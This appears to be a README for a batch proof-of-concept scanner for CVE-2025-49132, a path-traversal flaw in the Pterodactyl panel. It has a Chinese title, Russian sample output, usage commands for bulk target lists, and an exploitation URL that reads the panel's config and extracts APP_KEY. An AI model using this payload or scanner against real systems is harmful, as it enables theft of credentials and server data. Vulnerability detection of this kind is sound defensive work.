
Pterodactyl翼龙面板CVE-2025-49132批量检测☝️🤓
python3 CVE-2025-49132_poc.py -u http://pterodactyl.example.com
python3 CVE-2025-49132_poc.py -f 目标列表.txt
python3 CVE-2025-49132_poc.py -f 目标列表.txt -o 扫描结果.txt
При наличии уязвимости:
[+] Уязвимость подтверждена
Детали уязвимости:
• Тип: Path Traversal
• Вектор атаки: доступ к /locales/locale.json через параметр обхода путей
• URL эксплуатации: http://target.com/locales/locale.json?locale=..%2F..%2Fconfig&namespace=app
Потенциальное воздействие:
• Чтение учетных данных из конфигурационного файла панели (.env)
• Извлечение конфиденциальной информации из базы данных
• Доступ к файлам игровых серверов, управляемых панелью
Извлеченный APP_KEY: base64{{your_secret_key_here}}
Рекомендация по исправлению: немедленно обновить Pterodactyl до версии v1.11.11 или выше
При отсутствии уязвимости:
[-] Уязвимость не обнаружена: не обнаружена (код состояния: 404)
Сводка сканирования:
Сводка сканирования:
• Всего сканированных целей: 5
• Целей с уязвимостями: 2
• Безопасных целей: 3
[!] Критично: Обнаружены системы с уязвимостями! Требуются немедленные действия.